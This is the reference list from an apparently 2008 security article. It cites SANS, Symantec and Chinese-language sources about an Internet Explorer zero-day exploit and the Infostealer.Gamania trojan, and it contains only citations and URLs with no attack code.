Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl


[1] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, http://isc.sans.org/diary.html?storyid=5458 (accessed on December 11, 2008)

[2] “Alert: IE70DAY attack code has been linked to the use of  Trojan Horse”, December 12, 2008, http://www.scanw.com/blog/archives/303 (accessed on December 11, 2008 – Eastern Time GMT-5)

[3] Translated by Google Translate from Chinese, http://bbs.wopti.net/thread-80485-1-1.html (accessed on December 11, 2008)

[4] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, http://isc.sans.org/diary.html?storyid=5458 (accessed on December 11, 2008)

[5] “Infostealer.Gamania”, Hiroshi Shinotsuka, Symantec, February 13, 2007, http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99 (accessed on December 11, 2008)

[6] Ibid.